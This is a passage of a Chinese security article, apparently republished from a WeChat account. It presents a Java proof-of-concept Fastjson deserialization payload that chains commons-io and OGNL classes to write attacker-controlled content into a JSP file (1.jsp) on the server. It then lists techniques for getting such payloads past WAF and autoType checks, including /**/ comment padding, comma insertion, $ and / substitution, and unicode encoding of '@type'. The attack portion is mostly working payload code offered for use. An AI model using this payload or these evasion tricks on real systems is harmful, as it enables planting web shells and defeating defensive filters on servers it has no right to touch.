\"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\"\r\n"                + "      },\r\n"                + "      \"charsetName\":\"UTF-8\",\r\n"                + "      \"bufferSize\":1024\r\n"                + "    },\r\n"                + "            \"branch\":{\r\n"                + "      \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"                + "      \"writer\":{\r\n"                + "        \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"                + "        \"file\":\"1.jsp\",\r\n"                + "        \"encoding\":\"UTF-8\",\r\n"                + "        \"append\": false\r\n"                + "      },\r\n"                + "      \"charsetName\":\"UTF-8\",\r\n"                + "      \"bufferSize\": 1024,\r\n"                + "      \"writeImmediately\": true\r\n"                + "    },\r\n"                + "        \"closeBranch\": true\r\n"                + "      },\r\n"                + "      \"httpContentType\":\"text/xml\",\r\n"                + "      \"lenient\":false,\r\n"                + "      \"defaultEncoding\":\"UTF-8\"\r\n"                + "    },\r\n"                + "              \"charsetName\": \"UTF-8\",\r\n"                + "              \"bufferSize\": 1024\r\n"                + "            },\r\n"                + "            \"boms\": [{\r\n"                + "              \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"                + "              \"charsetName\": \"UTF-8\",\r\n"                + "              \"bytes\": [\r\n"                + "                36,82\r\n"                + "              ]\r\n"                + "            }]\r\n"                + "          }\r\n"                + "        }\r\n"                + "      }\r\n"                + "    },\r\n"                + "    \"su17\": {\r\n"                + "      \"@type\": \"ognl.Evaluation\",\r\n"                + "      \"node\": {\r\n"                + "        \"@type\": \"ognl.ASTMethod\",\r\n"                + "        \"p\": {\r\n"                + "          \"@type\": \"ognl.OgnlParser\",\r\n"                + "          \"stream\": {\r\n"                + "            \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"                + "            \"delegate\": {\r\n"                + "              \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"                + "              \"reader\": {\r\n"                + "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"                + "      \"is\":{\r\n"                + "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"                + "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"                + "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"                + "        \"closeBranch\": true\r\n"                + "      },\r\n"                + "      \"httpContentType\":\"text/xml\",\r\n"                + "      \"lenient\":false,\r\n"                + "      \"defaultEncoding\":\"UTF-8\"\r\n"                + "    },\r\n"                + "              \"charsetName\": \"UTF-8\",\r\n"                + "              \"bufferSize\": 1024\r\n"                + "            },\r\n"                + "            \"boms\": [{\r\n"                + "              \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"                + "              \"charsetName\": \"UTF-8\",\r\n"                + "              \"bytes\": [\r\n"                + "                36,82\r\n"                + "              ]\r\n"                + "            }]\r\n"                + "          }\r\n"                + "        }\r\n"                + "      }\r\n"                + "    },\r\n"                + "    \"su18\": {\r\n"                + "      \"@type\": \"ognl.Evaluation\",\r\n"                + "      \"node\": {\r\n"                + "        \"@type\": \"ognl.ASTMethod\",\r\n"                + "        \"p\": {\r\n"                + "          \"@type\": \"ognl.OgnlParser\",\r\n"                + "          \"stream\": {\r\n"                + "            \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"                + "            \"delegate\": {\r\n"                + "              \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"                + "              \"reader\": {\r\n"                + "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"                + "      \"is\":{\r\n"                + "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"                + "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"                + "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"                + "        \"closeBranch\": true\r\n"                + "      },\r\n"                + "      \"httpContentType\":\"text/xml\",\r\n"                + "      \"lenient\":false,\r\n"                + "      \"defaultEncoding\":\"UTF-8\"\r\n"                + "    },\r\n"                + "              \"charsetName\": \"UTF-8\",\r\n"                + "              \"bufferSize\": 1024\r\n"                + "            },\r\n"                + "            \"boms\": [{\r\n"                + "              \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"                + "              \"charsetName\": \"UTF-8\",\r\n"                + "              \"bytes\": [\r\n"                + "                36,82\r\n"                + "              ]\r\n"                + "            }]\r\n"                + "          }\r\n"                + "        }\r\n"                + "      }\r\n"                + "    },\r\n"                + "    \"su19\": {\r\n"                + "      \"@type\": \"ognl.Evaluation\",\r\n"                + "      \"node\": {\r\n"                + "        \"@type\": \"ognl.ASTMethod\",\r\n"                + "        \"p\": {\r\n"                + "          \"@type\": \"ognl.OgnlParser\",\r\n"                + "          \"stream\": {\r\n"                + "            \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"                + "            \"delegate\": {\r\n"                + "              \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"                + "              \"reader\": {\r\n"                + "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"                + "      \"is\":{\r\n"                + "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"                + "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"                + "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"                + "        \"closeBranch\": true\r\n"                + "      },\r\n"                + "      \"httpContentType\":\"text/xml\",\r\n"                + "      \"lenient\":false,\r\n"                + "      \"defaultEncoding\":\"UTF-8\"\r\n"                + "    },\r\n"                + "              \"charsetName\": \"UTF-8\",\r\n"                + "              \"bufferSize\": 1024\r\n"                + "            },\r\n"                + "            \"boms\": [{\r\n"                + "              \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"                + "              \"charsetName\": \"UTF-8\",\r\n"                + "              \"bytes\": [\r\n"                + "                36,82\r\n"                + "              ]\r\n"                + "            }]\r\n"                + "          }\r\n"                + "        }\r\n"                + "      }\r\n"                + "    },  \r\n"                + "  }\r\n"                + "";        System.out.println(poc2);
        JSON.parseObject(poc2);    }}

waf绕过

最后再来看看waf绕过的问题,在处理流程中发现以下的处理函数

JSONLexerBase#skipWhitespace

 if (this.ch == ' ' || this.ch == '\r' || this.ch == '\n' || this.ch == '\t' || this.ch == '\f' || this.ch == '\b') {                        this.next();                        continue;                    }
                    if (this.ch == '/') {

总结规则可如下

无限制添加 \r 空格 \n \f \t \b当/开头 后面可以加* *后面可以继续加/ 中间可任意填充数据 如以下格式/*11*/aa:123,会取到aa:123 其中在/**/可以填充大量的垃圾数据,类似下面图1这样/**/,/**/a这种也能

可以在前面一直加",",效果同上

要求限制

": 第二个双引号后面必须跟冒号

checkAutoType

绕过方法

(1)大量脏数据绕过 @type引起来 前面可以任意加/**/,中间穿插逗号

/**//**//**//**//**//**//**//**//**//**/,/**/"@type":123bc

(2)$替换.

{/**//**//**//**//**//**//**//**//**//**/,/**/\"@type\":\"aa$aa\"}";

(3)直接使用/

{/**//**//**//**//**//**//**//**//**//**/,/**/\"@type\":\"aa/aa\"}";

(4)unicode或者hex编码

JSONLexerBase#scanSymbol

{/**//**//**//**//**//**//**//**//**//**/,/**/"\u0040\u0074\u0079\u0070\u0065":"aa/aa"}={/**//**//**//**//**//**//**//**//**//**/,/**/"@type":"aa/aa"}
原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:[email protected]

文章类型:黑客极客技术、信息安全热点安全研究分析安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情,点我查看!

靶场实操,戳“阅读原文“

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652891343&idx=1&sn=e75d843a9c73005c3ab43e6a444086ec&chksm=bd5994028a2e1d146b2abbca071f468a481ddc35b4a4e9fd19b20d5f6f79902d750d52e1aba1#rd
如有侵权请联系:admin#unsafe.sh